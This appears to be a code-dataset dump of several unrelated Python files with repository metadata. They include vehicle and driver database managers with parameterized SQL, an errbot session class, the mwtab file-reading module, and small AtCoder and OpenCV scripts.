] | null | null | null | app/vehicle/managers.py | ab7289-tandon-nyu/csgy6083_PDS_Project | d2b7d22274dcabbb6ae35c17a8ffd06498f3634f | [
"MIT"
] | null | null | null | app/vehicle/managers.py | ab7289-tandon-nyu/csgy6083_PDS_Project | d2b7d22274dcabbb6ae35c17a8ffd06498f3634f | [
"MIT"
] | null | null | null | from typing import List, Optional
from jinjasql import JinjaSql
from app.db import DBManager
from app.vehicle.models import Driver, Vehicle
| 38.473333 | 119 | 0.39866 | from typing import List, Optional
from jinjasql import JinjaSql
from app.db import DBManager
from app.vehicle.models import Driver, Vehicle
class VehicleManager(DBManager):
    """Data-access object for the `ab_vehicle` table (CRUD keyed on VIN).

    All read methods return None (after printing a diagnostic) on DB error
    or when nothing matches; write methods return a success flag.
    """

    # Column list shared by every SELECT so rows hydrate Vehicle(**row) directly.
    _SELECT = (
        "SELECT `make`, `model`, `year`, `state`, `policy_id`, `vin` "
        "FROM `ab_vehicle` "
    )
    # Sentinel distinguishing "DB error" from "query matched no rows".
    _DB_ERROR = object()

    def _fetch(self, sql, params, context, many):
        """Run a SELECT; return row(s), or _DB_ERROR after logging on failure."""
        with self.get_connection() as conn:
            with conn.cursor() as cursor:
                try:
                    cursor.execute(sql, params)
                    return cursor.fetchall() if many else cursor.fetchone()
                except Exception as ex:
                    print(
                        f"There was a DB error when {context}. EX: {ex}",
                        flush=True,
                    )
                    return self._DB_ERROR

    def _write(self, sql, params, context):
        """Run an INSERT/UPDATE/DELETE and commit; True on success."""
        with self.get_connection() as conn:
            with conn.cursor() as cursor:
                try:
                    cursor.execute(sql, params)
                    conn.commit()
                except Exception as ex:
                    print(
                        f"There was a DB error when {context}. EX: {ex}",
                        flush=True,
                    )
                    return False
                return True

    def get_by_id(self, vin: str) -> Optional[Vehicle]:
        """Return the Vehicle with this VIN, or None when missing or on error."""
        row = self._fetch(self._SELECT + "WHERE `vin`=%s", (vin,),
                          f"trying to retrieve Vehicle {vin}", many=False)
        if row is self._DB_ERROR:
            return None
        if not row:
            print(f"No vehicle found for id: {vin}", flush=True)
            return None
        return Vehicle(**row)

    def get_by_ids(self, vins: List[str]) -> Optional[List[Vehicle]]:
        """Returns a list of Vehicles matching the supplied VINs."""
        # see https://stackoverflow.com/questions/589284/imploding-a-list-for-use-in-a-python-mysqldb-in-clause
        placeholders = ",".join(["%s"] * len(vins))
        rows = self._fetch(self._SELECT + f"WHERE `vin` IN ({placeholders})",
                           tuple(vins), f"retrieving vehicles: {vins}", many=True)
        if rows is self._DB_ERROR:
            return None
        if not rows:
            print(f"No Vehicles found for following list of VINs: {vins}",
                  flush=True)
            return None
        return [Vehicle(**row) for row in rows]

    def get_by_policy(self, policy_id: int) -> Optional[List[Vehicle]]:
        """Retrieves a list of Vehicles associated with the specified policy."""
        rows = self._fetch(self._SELECT + "WHERE `policy_id`=%s", (policy_id,),
                           f"retrieving Vehicles for policy: {policy_id}",
                           many=True)
        if rows is self._DB_ERROR:
            return None
        if not rows:
            print(f"No Vehicles found associated with policy: {policy_id}",
                  flush=True)
            return None
        return [Vehicle(**row) for row in rows]

    def create(self, vehicle: Vehicle) -> Optional[str]:
        """Creates a new Vehicle record and returns its PK (the VIN) or None."""
        sql = (
            "INSERT INTO `ab_vehicle` "
            "(`make`, `model`, `year`, `state`, `policy_id`, `vin`) "
            "VALUES (%s, %s, %s, %s, %s, %s);"
        )
        params = (vehicle.make, vehicle.model, vehicle.year,
                  vehicle.state, vehicle.policy_id, vehicle.vin)
        if self._write(sql, params, "trying to insert a new vehicle"):
            return vehicle.vin
        return None

    def update(self, vehicle: Vehicle) -> bool:
        """Updates the vehicle record in the DB; True on success."""
        sql = (
            "UPDATE `ab_vehicle` SET "
            "`make`=%s, `model`=%s, `year`=%s, `state`=%s "
            "WHERE `vin`=%s;"
        )
        params = (vehicle.make, vehicle.model, vehicle.year,
                  vehicle.state, vehicle.vin)
        return self._write(sql, params, f"updating vehicle {vehicle.vin}")

    def delete(self, vin: str) -> bool:
        """Deletes the vehicle with the specified VIN; True on success."""
        print(f"Deleting vin: {vin}", flush=True)
        ok = self._write("DELETE FROM `ab_vehicle` WHERE `vin`=%s", (vin,),
                         f"trying to delete vehicle {vin}")
        if ok:
            print("deleted succeeded", flush=True)
        return ok
class DriverManager(DBManager):
    """Data-access object for the `ab_driver` table (CRUD keyed on license).

    Read methods return None (after printing a diagnostic) on DB error or
    when nothing matches; write methods return a success flag.
    """

    # Column list shared by every SELECT so rows hydrate Driver(**row) directly.
    _SELECT = (
        "SELECT `fname`, `mname`, `lname`, `birthdate`, `license` "
        "FROM `ab_driver` "
    )
    # Sentinel distinguishing "DB error" from "no matching rows".
    _DB_ERROR = object()

    def _fetch(self, sql, params, context, many):
        """Run a SELECT; return row(s), or _DB_ERROR after logging on failure."""
        with self.get_connection() as conn:
            with conn.cursor() as cursor:
                try:
                    cursor.execute(sql, params)
                    return cursor.fetchall() if many else cursor.fetchone()
                except Exception as ex:
                    print(
                        f"There was a DB error when {context}. EX: {ex}",
                        flush=True,
                    )
                    return self._DB_ERROR

    def _write(self, sql, params, context):
        """Run a mutating statement and commit; True on success."""
        with self.get_connection() as conn:
            with conn.cursor() as cursor:
                try:
                    cursor.execute(sql, params)
                    conn.commit()
                except Exception as ex:
                    print(
                        f"There was a DB error when {context}. EX: {ex}",
                        flush=True,
                    )
                    return False
                return True

    def get_by_id(self, license: str) -> Optional[Driver]:
        """Return the Driver for this license, or None when missing or on error."""
        row = self._fetch(self._SELECT + "WHERE `license`=%s", (license,),
                          f"trying to retrieve driver {license}", many=False)
        if row is self._DB_ERROR:
            return None
        if not row:
            print(f"No driver found for id: {license}", flush=True)
            return None
        return Driver(**row)

    def get_by_ids(self, licenses: List[str]) -> Optional[List[Driver]]:
        """Returns a list of Drivers matching the supplied licenses."""
        # see https://stackoverflow.com/questions/589284/imploding-a-list-for-use-in-a-python-mysqldb-in-clause
        placeholders = ",".join(["%s"] * len(licenses))
        rows = self._fetch(self._SELECT + f"WHERE `license` IN ({placeholders})",
                           tuple(licenses), f"retrieving drivers: {licenses}",
                           many=True)
        if rows is self._DB_ERROR:
            return None
        if not rows:
            print(f"No drivers found for following list of licenses: {licenses}",
                  flush=True)
            return None
        return [Driver(**row) for row in rows]

    def create(self, driver: Driver) -> Optional[str]:
        """Creates a new Driver record and returns its PK (the license) or None."""
        sql = (
            "INSERT INTO `ab_driver` "
            "(`fname`, `mname`, `lname`, `birthdate`, `license`) "
            "VALUES (%s, %s, %s, %s, %s);"
        )
        params = (driver.fname, driver.mname, driver.lname,
                  driver.birthdate, driver.license)
        if self._write(sql, params, "trying to insert a new driver"):
            return driver.license
        return None

    def update(self, driver: Driver) -> bool:
        """Updates the driver record in the DB; True on success."""
        sql = (
            "UPDATE `ab_driver` SET "
            "`fname`=%s, `mname`=%s, `lname`=%s, `birthdate`=%s "
            "WHERE `license`=%s;"
        )
        params = (driver.fname, driver.mname, driver.lname,
                  driver.birthdate, driver.license)
        return self._write(sql, params, f"updating driver {driver.license}")

    def delete(self, license: str) -> bool:
        """Deletes the driver with the specified license; True on success."""
        return self._write("DELETE FROM `ab_driver` WHERE `license`=%s;",
                           (license,), f"trying to delete driver {license}")
class VDManager(DBManager):
    """Manages the many-to-many driver/vehicle relation in `ab_driver_vehicle`.

    (The former no-op ``__init__`` override was removed; ``DBManager.__init__``
    runs unchanged.)
    """

    def get_vehicles_for_driver(
        self, license: str, complement: bool = False
    ) -> Optional[List[Vehicle]]:
        """Vehicles linked to `license`; with complement=True, vehicles of every
        OTHER driver.  Returns None on DB error."""
        with self.get_connection() as conn:
            with conn.cursor() as cursor:
                sql_template = """
                    SELECT
                        `v`.`make`, `v`.`model`, `v`.`year`, `v`.`state`, `v`.`policy_id`, `v`.`vin`
                    FROM `ab_vehicle` v
                    JOIN `ab_driver_vehicle` dv ON `v`.`vin` = `dv`.`vin`
                    JOIN `ab_driver` d ON `dv`.`license` = `d`.`license`
                    {% if complement %}
                    WHERE `d`.`license` != {{ license }}
                    {% else %}
                    WHERE `d`.`license` = {{ license }}
                    {% endif %}
                """
                query, bind_params = JinjaSql().prepare_query(
                    sql_template, {"complement": complement, "license": license}
                )
                results = None
                try:
                    cursor.execute(query, bind_params)
                    results = cursor.fetchall()
                except Exception as ex:
                    print(
                        f"There was a DB error when retrieving vehicles for driver {license}. EX: {ex}",
                        flush=True,
                    )
                    return None
                if results is None:
                    # BUGFIX: this branch previously only printed and then fell
                    # through to iterate None; now it returns None like its
                    # sibling get_drivers_for_vehicle.
                    print(
                        f"Didn't find any vehicles associated with license {license}",
                        flush=True,
                    )
                    return None
                return [Vehicle(**result) for result in results]

    def get_drivers_for_vehicle(
        self, vin: str, complement: bool = False
    ) -> Optional[List[Driver]]:
        """Drivers linked to `vin`; with complement=True, drivers of every OTHER
        vehicle.  Returns None on DB error or when nothing matches."""
        with self.get_connection() as conn:
            with conn.cursor() as cursor:
                sql_template = """
                    SELECT
                        `d`.`fname`, `d`.`mname`, `d`.`lname`, `d`.`birthdate`, `d`.`license`
                    FROM `ab_driver` d
                    JOIN `ab_driver_vehicle` dv ON `d`.`license` = `dv`.`license`
                    JOIN `ab_vehicle` v ON `dv`.`vin` = `v`.`vin`
                    {% if complement %}
                    WHERE `v`.`vin` != {{ vin }}
                    {% else %}
                    WHERE `v`.`vin` = {{ vin }}
                    {% endif %}
                """
                query, bind_params = JinjaSql().prepare_query(
                    sql_template, {"complement": complement, "vin": vin}
                )
                results = None
                try:
                    cursor.execute(query, bind_params)
                    results = cursor.fetchall()
                except Exception as ex:
                    print(
                        f"There was a DB error when retrieving drivers for vehicle {vin}. EX: {ex}",
                        flush=True,
                    )
                    return None
                if results is None:
                    print(
                        f"Did not return any drivers associated with vehicle {vin}",
                        flush=True,
                    )
                    return None
                return [Driver(**result) for result in results]

    def add_relation(self, vin: str, license: str) -> bool:
        """Creates a new relation between the specified driver and vehicle."""
        with self.get_connection() as conn:
            with conn.cursor() as cursor:
                sql = (
                    "INSERT INTO `ab_driver_vehicle` (`vin`, `license`) "
                    "VALUES (%s, %s)"
                )
                try:
                    cursor.execute(sql, (vin, license))
                    conn.commit()
                except Exception as ex:
                    print(
                        "There was a DB Error when creating a relation between "
                        f"vin {vin} and license {license}. EX: {ex}",
                        flush=True,
                    )
                    return False
                return True

    def delete_relation(self, vin: str, license: str) -> bool:
        """Removes a relation between the specified driver and vehicle."""
        with self.get_connection() as conn:
            with conn.cursor() as cursor:
                sql = "DELETE FROM `ab_driver_vehicle` WHERE `vin`=%s AND `license`=%s"
                try:
                    cursor.execute(sql, (vin, license))
                    conn.commit()
                except Exception as ex:
                    print(
                        "There was a DB error when trying to remove relation between "
                        f"vin {vin} and license {license}. EX: {ex}",
                        flush=True,
                    )
                    return False
                return True
| 5,112 | 11,987 | 69 |
8c945debc7403eef7d5bb53554f95856e8985e78 | 79 | py | Python | abc240/b/test.py | seigot/atcoder | 6c2da684c75b7c5de162de3713a13507aeecce1d | [
"MIT"
] | 2 | 2021-12-28T11:43:47.000Z | 2022-02-20T14:41:27.000Z | abc240/b/test.py | seigot/atcoder | 6c2da684c75b7c5de162de3713a13507aeecce1d | [
"MIT"
] | null | null | null | abc240/b/test.py | seigot/atcoder | 6c2da684c75b7c5de162de3713a13507aeecce1d | [
"MIT"
] | null | null | null | n = input()
arr = list(map(int, input().split()))
s = set(arr)
print(len(s))
| 13.166667 | 37 | 0.56962 | n = input()
arr = list(map(int, input().split()))
s = set(arr)
print(len(s))
| 0 | 0 | 0 |
c6b099c2eeccca6fd594c51318bc6cd9faebc7ab | 41 | py | Python | src/pruebas.py | edoomm/compiladores | f8badd2f44e4e0273161266f739aab7c1ca5dfb2 | [
"MIT"
] | 1 | 2021-03-23T14:22:26.000Z | 2021-03-23T14:22:26.000Z | src/pruebas.py | edoomm/compiladores | f8badd2f44e4e0273161266f739aab7c1ca5dfb2 | [
"MIT"
] | null | null | null | src/pruebas.py | edoomm/compiladores | f8badd2f44e4e0273161266f739aab7c1ca5dfb2 | [
"MIT"
] | null | null | null |
# Print the characters for code points 0-254, one per line.
for code_point in range(255):
    print(chr(code_point))
| 8.2 | 20 | 0.560976 |
for i in range(255):
print(chr(i))
| 0 | 0 | 0 |
5b15f03a9e21ad9e630b8c38b2ac80ff1cf06549 | 4,625 | py | Python | lib/session.py | Hiteshsuhas/err-stackstorm | 7579350ac50d9324b64a73b86d57e094270cb275 | [
"Apache-2.0"
] | 15 | 2016-09-19T12:06:12.000Z | 2021-11-30T12:04:44.000Z | lib/session.py | Hiteshsuhas/err-stackstorm | 7579350ac50d9324b64a73b86d57e094270cb275 | [
"Apache-2.0"
] | 22 | 2017-06-19T18:13:54.000Z | 2021-05-28T09:25:01.000Z | lib/session.py | Hiteshsuhas/err-stackstorm | 7579350ac50d9324b64a73b86d57e094270cb275 | [
"Apache-2.0"
] | 7 | 2017-06-19T17:03:59.000Z | 2021-09-27T11:06:31.000Z | # coding:utf-8
import uuid
import string
import hashlib
import logging
from lib.errors import SessionExpiredError, SessionConsumedError
from datetime import datetime as dt
from random import SystemRandom
LOG = logging.getLogger("errbot.plugin.st2.session")
| 34.774436 | 99 | 0.611676 | # coding:utf-8
import uuid
import string
import hashlib
import logging
from lib.errors import SessionExpiredError, SessionConsumedError
from datetime import datetime as dt
from random import SystemRandom
LOG = logging.getLogger("errbot.plugin.st2.session")
def generate_password(length=8):
    """Return a random string of hex digits, capped at 255 characters."""
    capped_length = min(length, 255)
    rng = SystemRandom()
    return "".join(rng.choice(string.hexdigits) for _ in range(capped_length))
class Session(object):
    """One-time-use, time-limited authentication session for a chat user."""

    def __init__(self, user_id, user_secret, session_ttl=3600):
        """Create a sealed session whose secret is hashed against a bot salt."""
        self.bot_secret = None
        self.user_id = user_id
        self._is_sealed = True
        self.session_id = uuid.uuid4()
        now = int(dt.now().timestamp())
        self.create_date = now
        self.modified_date = now
        self.ttl_in_seconds = session_ttl
        self._hashed_secret = self.hash_secret(user_secret)
        del user_secret

    def is_expired(self):
        """
        Returns False if both create and modified timestamps have exceeded the ttl.
        """
        deadline = self.modified_date + self.ttl_in_seconds
        if deadline < int(dt.now().timestamp()):
            raise SessionExpiredError
        return False

    def attributes(self):
        """Session metadata as a dict with human-readable timestamps."""
        return {
            "UserID": self.user_id,
            "IsSealed": self._is_sealed,
            "SessionID": self.session_id,
            "CreationDate": str(dt.fromtimestamp(self.create_date)),
            "ModifiedDate": str(dt.fromtimestamp(self.modified_date)),
            "ExpiryDate": str(dt.fromtimestamp(self.modified_date + self.ttl_in_seconds)),
        }

    def __repr__(self):
        expiry = dt.fromtimestamp(self.modified_date + self.ttl_in_seconds)
        return (
            f"UserID: {self.user_id}, "
            f"Is Sealed: {self._is_sealed}, "
            f"SessionID: {self.session_id}, "
            f"Creation Date: {dt.fromtimestamp(self.create_date)}, "
            f"Modified Date: {dt.fromtimestamp(self.modified_date)}, "
            f"Expiry Date: {expiry}"
        )

    def unseal(self):
        """
        Mark the session as being consumed. Returns true if the session was available to be
        consumed or raises SessionConsumedError if the session has already been marked as consumed.
        """
        self.is_expired()
        if not self._is_sealed:
            raise SessionConsumedError
        self._is_sealed = False
        return True

    def is_sealed(self):
        """
        Query the state of the one time use flag.
        Returns True if the session has not been consumed or False if the session has already been
        consumed.
        """
        self.is_expired()
        return self._is_sealed

    def id(self):
        """
        Return the UUID for the session.
        """
        return str(self.session_id)

    def ttl(self, ttl=None):
        """
        Get/Set the time to live for the session.
        param: ttl[int] The number of seconds the session should remain valid since creation or
        modification.
        Returns the number of seconds the ttl has been set to if no agrument is provided otherwise
        the ttl is set to the number of seconds provided to the ttl argument.
        """
        self.is_expired()
        if ttl is None:
            return self.ttl_in_seconds
        if not isinstance(ttl, int):
            LOG.warning("session ttl must be an integer type, got '{}'".format(ttl))
            return
        self.ttl_in_seconds = ttl
        self.modified_date = int(dt.now().timestamp())

    def hash_secret(self, user_secret):
        """
        Generate a unique token by hashing a random bot secret with the user secrets.
        param: user_secret[string] - The users secret provided in the chat backend.
        """
        self.is_expired()
        if self.bot_secret is None:
            # Lazily created once; reused so repeated hashes stay comparable.
            self.bot_secret = generate_password(8)
        digest = hashlib.sha256()
        digest.update(bytes(user_secret, "utf-8"))
        del user_secret
        digest.update(bytes(self.bot_secret, "utf-8"))
        return digest.hexdigest()

    def match_secret(self, user_secret):
        """
        Compare a secret with the session's hashed secret.
        param: user_secret[string] the secret to compare.
        Return True if the user_secret hash has matches the session hash or False if it does not.
        """
        self.is_expired()
        return self.hash_secret(user_secret) == self._hashed_secret
| 1,487 | 2,832 | 46 |
66388d70125d6d722d8baaab807b4f12201dcdd0 | 7,710 | py | Python | mwtab/fileio.py | MoseleyBioinformaticsLab/mwtab | 1bc1e3715538348b29a5760a9c3184fe04f568a6 | [
"BSD-3-Clause-Clear"
] | 7 | 2018-02-02T07:50:20.000Z | 2021-03-14T22:46:58.000Z | mwtab/fileio.py | MoseleyBioinformaticsLab/mwtab | 1bc1e3715538348b29a5760a9c3184fe04f568a6 | [
"BSD-3-Clause-Clear"
] | 2 | 2019-02-14T08:38:54.000Z | 2020-02-19T08:08:02.000Z | mwtab/fileio.py | MoseleyBioinformaticsLab/mwtab | 1bc1e3715538348b29a5760a9c3184fe04f568a6 | [
"BSD-3-Clause-Clear"
] | 1 | 2019-10-12T23:38:44.000Z | 2019-10-12T23:38:44.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
mwtab.fileio
~~~~~~~~~~~~
This module provides routines for reading ``mwTab`` formatted files
from difference kinds of sources:
* Single ``mwTab`` formatted file on a local machine.
* Directory containing multiple ``mwTab`` formatted files.
* Compressed zip/tar archive of ``mwTab`` formatted files.
* URL address of ``mwTab`` formatted file.
* ``ANALYSIS_ID`` of ``mwTab`` formatted file.
"""
import os
import io
import zipfile
import tarfile
import bz2
import gzip
from re import match
from . import mwtab
from . import validator
from . import mwschema
from . import mwrest
from urllib.request import urlopen
from urllib.parse import urlparse
VERBOSE = False
def _generate_filenames(sources):
"""Generate filenames.
:param tuple sources: Sequence of strings representing path to file(s).
:return: Path to file(s).
:rtype: :py:class:`str`
"""
for source in sources:
if os.path.isdir(source):
for path, _, filelist in os.walk(source):
for fname in filelist:
if os.path.splitext(fname)[1].lower() in {".csv", ".txt", ".json"}:
if GenericFilePath.is_compressed(fname):
if VERBOSE:
print("Skipping compressed file: {}".format(os.path.abspath(fname)))
continue
else:
yield os.path.join(path, fname)
elif os.path.isfile(source):
yield source
elif source.isdigit():
yield next(mwrest.generate_mwtab_urls([source]))
# TODO: Add ST parsing
elif match(r"(AN[0-9]{6}$)", source):
yield next(mwrest.generate_mwtab_urls([source]))
elif GenericFilePath.is_url(source):
yield source
else:
raise TypeError("Unknown file source.")
def _generate_handles(filenames):
    """Open a sequence of filenames one at time producing file objects.
    The file is closed immediately when proceeding to the next iteration.

    :param generator filenames: Generator object that yields the path to each file, one at a time.
    :return: Filehandle to be processed into an instance.
    """
    for fname in filenames:
        for filehandle, source in GenericFilePath(fname).open():
            yield filehandle, source
            filehandle.close()
def read_files(*sources, **kwds):
    """Construct a generator that yields file instances.

    :param sources: One or more strings representing path to file(s).
    """
    for fh, source in _generate_handles(_generate_filenames(sources)):
        try:
            mwfile = mwtab.MWTabFile(source)
            mwfile.read(fh)
            if kwds.get('validate'):
                validator.validate_file(
                    mwtabfile=mwfile,
                    section_schema_mapping=mwschema.section_schema_mapping,
                )
            if VERBOSE:
                print("Processed file: {}".format(os.path.abspath(source)))
            yield mwfile
        except Exception as e:
            if VERBOSE:
                print("Error processing file: ", os.path.abspath(source), "\nReason:", e)
            raise e
def read_mwrest(*sources, **kwds):
    """Construct a generator that yields file instances.

    :param sources: One or more strings representing path to file(s).
    """
    for fh, source in _generate_handles(_generate_filenames(sources)):
        try:
            mwfile = mwrest.MWRESTFile(source)
            mwfile.read(fh)
            if VERBOSE:
                print("Processed url: {}".format(source))
            yield mwfile
        except Exception as e:
            # Unlike read_files(), failures here are reported and skipped.
            if VERBOSE:
                print("Error processing url: ", source, "\nReason:", e)
            pass
class GenericFilePath(object):
    """`GenericFilePath` class knows how to open local files or files over URL."""
    def __init__(self, path):
        """Initialize path.
        :param str path: String representing a path to local file(s) or valid URL address of file(s).
        """
        self.path = path
    def open(self):
        """Generator that opens and yields filehandles using appropriate facilities:
        test if path represents a local file or file over URL, if file is compressed
        or not.
        :return: Filehandle to be processed into an instance.
        """
        is_url = self.is_url(self.path)
        compression_type = self.is_compressed(self.path)
        if not compression_type:
            # Plain file: text-mode locally, raw response object for URLs.
            if is_url:
                filehandle = urlopen(self.path)
            else:
                filehandle = open(self.path, "r", encoding="utf-8")
            source = self.path
            yield filehandle, source
            filehandle.close()
        elif compression_type:
            # For remote archives, `path` is rebound to the downloaded BYTES
            # of the archive; for local archives it stays the filesystem path.
            if is_url:
                response = urlopen(self.path)
                path = response.read()
                response.close()
            else:
                path = self.path
            if compression_type == "zip":
                ziparchive = zipfile.ZipFile(io.BytesIO(path), "r") if is_url else zipfile.ZipFile(path)
                for name in ziparchive.infolist():
                    # Skip directory entries (names ending with "/").
                    if not name.filename.endswith("/"):
                        filehandle = ziparchive.open(name)
                        # Archive members are identified as "<archive>/<member>".
                        source = self.path + "/" + name.filename
                        yield filehandle, source
                        filehandle.close()
            elif compression_type in ("tar", "tar.bz2", "tar.gz"):
                tararchive = tarfile.open(fileobj=io.BytesIO(path)) if is_url else tarfile.open(path)
                for name in tararchive:
                    if name.isfile():
                        filehandle = tararchive.extractfile(name)
                        source = self.path + "/" + name.name
                        yield filehandle, source
                        filehandle.close()
            elif compression_type == "bz2":
                filehandle = bz2.BZ2File(io.BytesIO(path)) if is_url else bz2.BZ2File(path)
                source = self.path
                yield filehandle, source
                filehandle.close()
            elif compression_type == "gz":
                filehandle = gzip.open(io.BytesIO(path)) if is_url else gzip.open(path)
                source = self.path
                yield filehandle, source
                filehandle.close()
    @staticmethod
    def is_compressed(path):
        """Test if path represents compressed file(s).
        :param str path: Path to file(s).
        :return: String specifying compression type if compressed, "" otherwise.
        :rtype: :py:class:`str`
        """
        # Order matters: ".tar.gz"/".tar.bz2" must be checked before ".gz"/".bz2".
        if path.endswith(".zip"):
            return "zip"
        elif path.endswith(".tar.gz"):
            return "tar.gz"
        elif path.endswith(".tar.bz2"):
            return "tar.bz2"
        elif path.endswith(".gz"):
            return "gz"
        elif path.endswith(".bz2"):
            return "bz2"
        elif path.endswith(".tar"):
            return "tar"
        return ""
    @staticmethod
    def is_url(path):
        """Test if path represents a valid URL.
        :param str path: Path to file.
        :return: True if path is valid url string, False otherwise.
        :rtype: :py:obj:`True` or :py:obj:`False`
        """
        try:
            parse_result = urlparse(path)
            # Requires scheme, host AND a non-empty path component.
            return all((parse_result.scheme, parse_result.netloc, parse_result.path))
        except ValueError:
            return False
| 32.125 | 104 | 0.568742 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
mwtab.fileio
~~~~~~~~~~~~
This module provides routines for reading ``mwTab`` formatted files
from difference kinds of sources:
* Single ``mwTab`` formatted file on a local machine.
* Directory containing multiple ``mwTab`` formatted files.
* Compressed zip/tar archive of ``mwTab`` formatted files.
* URL address of ``mwTab`` formatted file.
* ``ANALYSIS_ID`` of ``mwTab`` formatted file.
"""
import os
import io
import zipfile
import tarfile
import bz2
import gzip
from re import match
from . import mwtab
from . import validator
from . import mwschema
from . import mwrest
from urllib.request import urlopen
from urllib.parse import urlparse
VERBOSE = False
def _generate_filenames(sources):
    """Generate filenames.

    Each entry in *sources* may be: a directory (walked recursively for
    ``.csv``/``.txt``/``.json`` files), a plain file path, an ``ANALYSIS_ID``
    (all digits, or "AN" followed by six digits — resolved to a REST URL via
    :mod:`mwrest`), or a URL.

    :param tuple sources: Sequence of strings representing path to file(s).
    :return: Path to file(s).
    :rtype: :py:class:`str`
    """
    for source in sources:
        if os.path.isdir(source):
            for path, _, filelist in os.walk(source):
                for fname in filelist:
                    if os.path.splitext(fname)[1].lower() in {".csv", ".txt", ".json"}:
                        # Compressed files found inside a directory are skipped,
                        # not expanded.
                        if GenericFilePath.is_compressed(fname):
                            if VERBOSE:
                                print("Skipping compressed file: {}".format(os.path.abspath(fname)))
                            continue
                        else:
                            yield os.path.join(path, fname)
        elif os.path.isfile(source):
            yield source
        elif source.isdigit():
            # Bare digits are treated as an analysis id and turned into a URL.
            yield next(mwrest.generate_mwtab_urls([source]))
        # TODO: Add ST parsing
        elif match(r"(AN[0-9]{6}$)", source):
            yield next(mwrest.generate_mwtab_urls([source]))
        elif GenericFilePath.is_url(source):
            yield source
        else:
            raise TypeError("Unknown file source.")
def _generate_handles(filenames):
    """Open each filename in turn, yielding ``(filehandle, source)`` pairs.

    Every handle is closed as soon as iteration moves past it.

    :param generator filenames: Generator object that yields the path to each file, one at a time.
    :return: Filehandle to be processed into an instance.
    """
    for filename in filenames:
        generic_path = GenericFilePath(filename)
        for handle, source in generic_path.open():
            yield handle, source
            handle.close()
def read_files(*sources, **kwds):
    """Construct a generator that yields file instances.

    :param sources: One or more strings representing path to file(s).
    :keyword validate: when truthy, each parsed file is also validated against
        ``mwschema.section_schema_mapping``.
    """
    filenames = _generate_filenames(sources)
    filehandles = _generate_handles(filenames)
    for fh, source in filehandles:
        try:
            f = mwtab.MWTabFile(source)
            f.read(fh)
            if kwds.get('validate'):
                validator.validate_file(mwtabfile=f,
                                        section_schema_mapping=mwschema.section_schema_mapping)
            if VERBOSE:
                print("Processed file: {}".format(os.path.abspath(source)))
            yield f
        except Exception as e:
            # Unlike read_mwrest(), a failure here is fatal: report (when
            # VERBOSE) and re-raise so the caller sees the broken file.
            if VERBOSE:
                print("Error processing file: ", os.path.abspath(source), "\nReason:", e)
            raise e
def read_mwrest(*sources, **kwds):
    """Construct a generator that yields file instances.

    :param sources: One or more strings representing path to file(s).
    """
    filenames = _generate_filenames(sources)
    filehandles = _generate_handles(filenames)
    for fh, source in filehandles:
        try:
            f = mwrest.MWRESTFile(source)
            f.read(fh)
            if VERBOSE:
                print("Processed url: {}".format(source))
            yield f
        except Exception as e:
            # Best-effort: a failing URL is reported (when VERBOSE) and
            # skipped, deliberately not re-raised.
            if VERBOSE:
                print("Error processing url: ", source, "\nReason:", e)
            pass
class GenericFilePath(object):
    """`GenericFilePath` class knows how to open local files or files over URL.

    Supported sources: plain files, zip / tar(.gz/.bz2) archives, and single
    gz / bz2 compressed files, either on disk or fetched over a URL.
    """

    def __init__(self, path):
        """Initialize path.

        :param str path: String representing a path to local file(s) or valid URL address of file(s).
        """
        self.path = path

    def open(self):
        """Generator that opens and yields filehandles using appropriate facilities:
        test if path represents a local file or file over URL, if file is compressed
        or not.

        Handles — and the enclosing zip/tar archives, which the original
        implementation leaked — are closed in ``finally`` blocks, so they are
        released even when the consumer abandons the generator early.

        :return: Filehandle to be processed into an instance.
        """
        is_url = self.is_url(self.path)
        compression_type = self.is_compressed(self.path)

        if not compression_type:
            # Plain file: URL handles are binary streams, local files are text.
            filehandle = urlopen(self.path) if is_url else open(self.path, "r", encoding="utf-8")
            try:
                yield filehandle, self.path
            finally:
                filehandle.close()
            return

        # Compressed source over URL: download the whole payload first so the
        # archive readers can seek within it.
        if is_url:
            response = urlopen(self.path)
            path = response.read()
            response.close()
        else:
            path = self.path

        if compression_type == "zip":
            ziparchive = zipfile.ZipFile(io.BytesIO(path), "r") if is_url else zipfile.ZipFile(path)
            try:
                for entry in ziparchive.infolist():
                    if not entry.filename.endswith("/"):  # skip directory entries
                        filehandle = ziparchive.open(entry)
                        try:
                            yield filehandle, self.path + "/" + entry.filename
                        finally:
                            filehandle.close()
            finally:
                ziparchive.close()  # was never closed in the original
        elif compression_type in ("tar", "tar.bz2", "tar.gz"):
            tararchive = tarfile.open(fileobj=io.BytesIO(path)) if is_url else tarfile.open(path)
            try:
                for member in tararchive:
                    if member.isfile():
                        filehandle = tararchive.extractfile(member)
                        try:
                            yield filehandle, self.path + "/" + member.name
                        finally:
                            filehandle.close()
            finally:
                tararchive.close()  # was never closed in the original
        elif compression_type == "bz2":
            filehandle = bz2.BZ2File(io.BytesIO(path)) if is_url else bz2.BZ2File(path)
            try:
                yield filehandle, self.path
            finally:
                filehandle.close()
        elif compression_type == "gz":
            filehandle = gzip.open(io.BytesIO(path)) if is_url else gzip.open(path)
            try:
                yield filehandle, self.path
            finally:
                filehandle.close()

    @staticmethod
    def is_compressed(path):
        """Test if path represents compressed file(s).

        :param str path: Path to file(s).
        :return: String specifying compression type if compressed, "" otherwise.
        :rtype: :py:class:`str`
        """
        # Compound suffixes must be tested before their tails
        # (".tar.gz" before ".gz").
        for compression_type in ("zip", "tar.gz", "tar.bz2", "gz", "bz2", "tar"):
            if path.endswith("." + compression_type):
                return compression_type
        return ""

    @staticmethod
    def is_url(path):
        """Test if path represents a valid URL.

        :param str path: Path to file.
        :return: True if path is valid url string, False otherwise.
        :rtype: :py:obj:`True` or :py:obj:`False`
        """
        try:
            parse_result = urlparse(path)
            return all((parse_result.scheme, parse_result.netloc, parse_result.path))
        except ValueError:
            return False
| 0 | 0 | 0 |
aa69cf9bb36a467022c07fe2ac1ca628a579afb9 | 1,897 | py | Python | 7-Color Detecting.py | macerman/Open-CV | 8a2bc35ba2610186fe2a38006b2ebbb3efbce31e | [
"MIT"
] | 1 | 2021-10-03T15:39:12.000Z | 2021-10-03T15:39:12.000Z | 7-Color Detecting.py | macerman/Open-CV | 8a2bc35ba2610186fe2a38006b2ebbb3efbce31e | [
"MIT"
] | null | null | null | 7-Color Detecting.py | macerman/Open-CV | 8a2bc35ba2610186fe2a38006b2ebbb3efbce31e | [
"MIT"
] | null | null | null | #--COLOR DETECTION--#
import cv2
import numpy as np
#our function for trackbars
